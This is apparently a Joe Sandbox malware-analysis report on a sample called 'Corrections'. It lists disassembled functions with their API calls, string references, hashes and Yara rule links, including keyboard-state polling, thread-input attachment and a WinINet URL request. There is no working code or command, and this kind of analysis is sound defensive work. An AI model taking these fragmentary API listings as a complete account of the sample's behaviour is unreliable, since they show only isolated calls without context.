API String ID: 2706829360-0
Opcode ID: 06e0475067eedf2dc7f78b52e53b250e360e4bbd882f0db11b28ef8174bd0222
Instruction ID: 765e4e0c7202e568abdf28d8e8dc1f24a11e879df8f7636295d989a09e41d9c9
Opcode Fuzzy Hash: 06e0475067eedf2dc7f78b52e53b250e360e4bbd882f0db11b28ef8174bd0222
Instruction Fuzzy Hash: 5F418335A00219DFCF10EFA4D8449AE7BB9FF88354F008469E955A7371EB34A945CF90

Function 0098A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0098A65D
GetAsyncKeyState.USER32(000000A0), ref: 0098A6DE
GetKeyState.USER32(000000A0), ref: 0098A6F9
GetAsyncKeyState.USER32(000000A1), ref: 0098A713
GetKeyState.USER32(000000A1), ref: 0098A728
GetAsyncKeyState.USER32(00000011), ref: 0098A740
GetKeyState.USER32(00000011), ref: 0098A752
GetAsyncKeyState.USER32(00000012), ref: 0098A76A
GetKeyState.USER32(00000012), ref: 0098A77C
GetAsyncKeyState.USER32(0000005B), ref: 0098A794
GetKeyState.USER32(0000005B), ref: 0098A7A6

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 572f4040ec62a56c93c7f25c3a22b8c5383a718a343bbe7b5c067ca1d7102cb8
Instruction ID: 4b5bbf290ab8fa2e7c39e6c36047fd1ef50bc06f6281b4be43fbb68ef8630df0
Opcode Fuzzy Hash: 572f4040ec62a56c93c7f25c3a22b8c5383a718a343bbe7b5c067ca1d7102cb8
Instruction Fuzzy Hash: 3C41A4649047C96DFF31A66089043A5BEB86B11354F08815FD5C64A7C2FBA89DC8D7A3

Function 009A9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 009A9750

Part of subcall function 00989805: _wcslen.LIBCMT ref: 00989828

_wcslen.LIBCMT ref: 009A97AB
_wcslen.LIBCMT ref: 009A97F9
_wcslen.LIBCMT ref: 009A9839
_wcslen.LIBCMT ref: 009A98CB

Strings

stdcall, xrefs: 009A9833, 009A9838
none, xrefs: 009A98C2, 009A98C7
cdecl, xrefs: 009A97A5, 009A97AA
winapi, xrefs: 009A97F3, 009A97F8

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: d9f6b721644f216065d034f835cdc27a3339d9ae70f92871f8d1ecd3e06c709f
Instruction ID: 1257a7533827822d97a6d62d0b18303506c7b0bc33c601534a47b7a9853b29e6
Opcode Fuzzy Hash: d9f6b721644f216065d034f835cdc27a3339d9ae70f92871f8d1ecd3e06c709f
Instruction Fuzzy Hash: B851C571A00516ABCF14DF6CC9909BEB7E9BF96364B204229E866E7284DB35DD40C7D0

Function 009A4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 009A41D1
CoUninitialize.OLE32 ref: 009A41DC
CoCreateInstance.OLE32(?,00000000,00000017,009C0B44,?), ref: 009A4236
IIDFromString.OLE32(?,?), ref: 009A42A9
VariantInit.OLEAUT32(?), ref: 009A4341
VariantClear.OLEAUT32(?), ref: 009A4393

Strings

Failed to create object, xrefs: 009A4241, 009A42F7
Invalid parameter, xrefs: 009A42C2
NULL Pointer assignment, xrefs: 009A427B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d735a50e4622ca59514253a89682e79ec73326519c58402dba9c885d65ac6924
Instruction ID: 93708a338fdb358d89e107f57992f14b61ed11463091ca38b422d9372eca13b9
Opcode Fuzzy Hash: d735a50e4622ca59514253a89682e79ec73326519c58402dba9c885d65ac6924
Instruction Fuzzy Hash: 2361AE716083019FC710DF64D988B6ABBE8EFCA714F000919F9959B291DBB4ED44CBD2

Function 00998BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00998C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00998CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00998CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00998D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00998D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00998D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00998DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00998DDA

Strings

*.*, xrefs: 00998DE0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 7603490a9438bdd1fa4ef561d97c09660db2666e2666f6867af244de14f25fa2
Instruction ID: cb3efdcc4df44be87d45245cb2abaf44a751d06502b4fbac8e72e69c52410fd9
Opcode Fuzzy Hash: 7603490a9438bdd1fa4ef561d97c09660db2666e2666f6867af244de14f25fa2
Instruction Fuzzy Hash: 92616CB65083059FCB10EF64C844A9FB3E8FF9A310F04491EF99987291EB35E945CB92

Function 009B46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 009B4715
SetMenu.USER32(?,00000000), ref: 009B4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B47AC
IsMenu.USER32(?), ref: 009B47C0
CreatePopupMenu.USER32 ref: 009B47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B47F7
DrawMenuBar.USER32 ref: 009B47FF

Strings

0, xrefs: 009B46F0
F, xrefs: 009B47EA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 67e9d74067b2a5df49b7aad9993706e6bbafa416b0e756a66c4f21513c4c72aa
Instruction ID: 020e26173c8db1bc17ef42563155c78e2eedfd46890201903646db72498cb2f0
Opcode Fuzzy Hash: 67e9d74067b2a5df49b7aad9993706e6bbafa416b0e756a66c4f21513c4c72aa
Instruction Fuzzy Hash: 01418778A12209AFDB24CF64DA84EEA7BB9FF49324F144128FA0597351D7B0A910EB50

Function 0098282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009828B1
GetDlgCtrlID.USER32 ref: 009828BC
GetParent.USER32 ref: 009828D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 009828DB
GetDlgCtrlID.USER32(?), ref: 009828E4
GetParent.USER32(?), ref: 009828F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 009828FB

Strings

ComboBox, xrefs: 00982839
ListBox, xrefs: 0098286E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 3b8e882bdfe82924806e2525e0e08dc0369357cf7cfe112219a898df63b8ddb4
Instruction ID: 8879acf56080cc74f92748726683cf062e6a8faeb88b5b2f3340d19b342aa294
Opcode Fuzzy Hash: 3b8e882bdfe82924806e2525e0e08dc0369357cf7cfe112219a898df63b8ddb4
Instruction Fuzzy Hash: 3D21C2B5900118BBCF05ABA0DC85EEEBBB8EF45360F000256F951A72D5DB355908DB60

Function 0098290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00982990
GetDlgCtrlID.USER32 ref: 0098299B
GetParent.USER32 ref: 009829B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 009829BA
GetDlgCtrlID.USER32(?), ref: 009829C3
GetParent.USER32(?), ref: 009829D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 009829DA

Strings

ComboBox, xrefs: 0098291A
ListBox, xrefs: 0098294F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 3978097ca84dc43b259fc7d36f417fff99ceffc18a1d945b114b924af9ea5ddf
Instruction ID: 45552a6e7161f253b7df972a9f7678a25531b7980b8a8c7e162d809121cf9422
Opcode Fuzzy Hash: 3978097ca84dc43b259fc7d36f417fff99ceffc18a1d945b114b924af9ea5ddf
Instruction Fuzzy Hash: 0E21D1B5901218BBCF05BBA0DC85EEEBBB8EF04350F104156F951A7295DB7A9908DB60

Function 009B44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009B4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009B453C
GetWindowLongW.USER32(?,000000F0), ref: 009B4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009B4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009B45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 009B4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 009B4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009B467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009B4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009B46AF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 28c65c95b65fa335670e55b45ffe8b365daab9df2bfc678fac124021a8216f41
Instruction ID: 70c0d535bf2bdf102f00089ec309804cee74a6b0e284437d17aba6de9af1bc71
Opcode Fuzzy Hash: 28c65c95b65fa335670e55b45ffe8b365daab9df2bfc678fac124021a8216f41
Instruction Fuzzy Hash: ED615A75A00208EFDB10DFA8CD81FEE77B8EB49714F104159FA14A72A2D7B4A945EB50

Function 0098BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0098BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 0098BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 0098BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BBE4

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 36bb053266b674d2b93432535b07c721e7741d443e8386f73bdd3951df19f0c4
Instruction ID: fb3d99da2be74971241396c4f07c8385ebf76e109bb69b5f4689196f3174483c
Opcode Fuzzy Hash: 36bb053266b674d2b93432535b07c721e7741d443e8386f73bdd3951df19f0c4
Instruction Fuzzy Hash: 0131D272928304AFDB10AB14DD84FBA3BADEB04322F184115FA05C72A0EB74EE40DB24

Function 00952FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00953007

Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60

_free.LIBCMT ref: 00953013
_free.LIBCMT ref: 0095301E
_free.LIBCMT ref: 00953029
_free.LIBCMT ref: 00953034
_free.LIBCMT ref: 0095303F
_free.LIBCMT ref: 0095304A
_free.LIBCMT ref: 00953055
_free.LIBCMT ref: 00953060
_free.LIBCMT ref: 0095306E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a786924c38f27c842081086e119472e56951b6feafb166bd528fabeb702ddcd9
Instruction ID: 82df41b1767796bc7a8e3289b2bcf3564dd4d9192c728f3ed85a40cf08d45ba8
Opcode Fuzzy Hash: a786924c38f27c842081086e119472e56951b6feafb166bd528fabeb702ddcd9
Instruction Fuzzy Hash: F111F876100108BFCB01EF96C842EDD3BB5EF56351BA144A5FE089F272DA31EE599B90

Function 00922AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00922AF9
OleUninitialize.OLE32(?,00000000), ref: 00922B98
UnregisterHotKey.USER32(?), ref: 00922D7D
DestroyWindow.USER32(?), ref: 00963A1B
FreeLibrary.KERNEL32(?), ref: 00963A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00963AAD

Strings

close all, xrefs: 00922AF4

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: c9e14a13b0698202a47c3e6c86f66f0e289c68d65b195b6ffc1ffa0466d334cf
Instruction ID: 70fa5339c8538f4944aa55b52294d446a3ee0780836e7664ce62ff73037f0a90
Opcode Fuzzy Hash: c9e14a13b0698202a47c3e6c86f66f0e289c68d65b195b6ffc1ffa0466d334cf
Instruction Fuzzy Hash: 54D1AE71705222DFCB28EF64D985B69F7A4FF44710F1182ADE94A6B2A5CB30AD12DF40

Function 00998835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009989F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00998A06
GetFileAttributesW.KERNEL32(?), ref: 00998A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00998A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00998A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00998AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00998AF5

Strings

*.*, xrefs: 00998AAB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: df14b6e81583a75ad2651cf7418dcfa7f5b38f6126c698534483b3e98feb76a3
Instruction ID: 7d61df0fafc360b81d664f617de47c65abbbbc225f9318f2c92fb6d4c3655762
Opcode Fuzzy Hash: df14b6e81583a75ad2651cf7418dcfa7f5b38f6126c698534483b3e98feb76a3
Instruction Fuzzy Hash: BA818E729042459BCF24EF58C484ABBB3E8BF8A310F584C1EF895D7251EB35E9458B92

Function 00927447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 009274D7

Part of subcall function 00927567: GetClientRect.USER32(?,?), ref: 0092758D
Part of subcall function 00927567: GetWindowRect.USER32(?,?), ref: 009275CE
Part of subcall function 00927567: ScreenToClient.USER32(?,?), ref: 009275F6

GetDC.USER32 ref: 00966083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00966096
SelectObject.GDI32(00000000,00000000), ref: 009660A4
SelectObject.GDI32(00000000,00000000), ref: 009660B9
ReleaseDC.USER32(?,00000000), ref: 009660C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00966152

Strings

U, xrefs: 00966021

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 712f1c953e860b6fbe8cd0a85ba139d0ae1aa5c77aa1ba01fb2ba09ab4e47b67
Instruction ID: 428a47345efa18d06a1316c9a5c72f282abd0053d32f2fa0f5e3a6da89388060
Opcode Fuzzy Hash: 712f1c953e860b6fbe8cd0a85ba139d0ae1aa5c77aa1ba01fb2ba09ab4e47b67
Instruction Fuzzy Hash: 8571E131508205EFCF21DFA4DD84AFA7BBAFF4A320F144669ED555A2A6C7358880EF50

Function 009B955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

Part of subcall function 009219CD: GetCursorPos.USER32(?), ref: 009219E1
Part of subcall function 009219CD: ScreenToClient.USER32(00000000,?), ref: 009219FE
Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000001), ref: 00921A23
Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000002), ref: 00921A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 009B95C7
ImageList_EndDrag.COMCTL32 ref: 009B95CD
ReleaseCapture.USER32 ref: 009B95D3
SetWindowTextW.USER32(?,00000000), ref: 009B966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009B9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 009B975B

Strings

@GUI_DRAGFILE, xrefs: 009B96F6
@GUI_DROPID, xrefs: 009B96AD

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 6ddebdf7b8c0266404ec6a9a3b0782c6f919820def2c00295c99aec89f267eb1
Instruction ID: 34b234798199e158c4ae429b3f1c1e00a6522721133cbee37bad74c55a728586
Opcode Fuzzy Hash: 6ddebdf7b8c0266404ec6a9a3b0782c6f919820def2c00295c99aec89f267eb1
Instruction Fuzzy Hash: DA51AD70118314AFD714EF20DD96FAA77E4FB88724F400A2CFA96972E2DB709944DB52

Function 0099CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0099CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0099CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0099CD0F
GetLastError.KERNEL32 ref: 0099CD67
SetEvent.KERNEL32(?), ref: 0099CD7B
InternetCloseHandle.WININET(00000000), ref: 0099CD86

Strings

, xrefs: 0099CD00

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
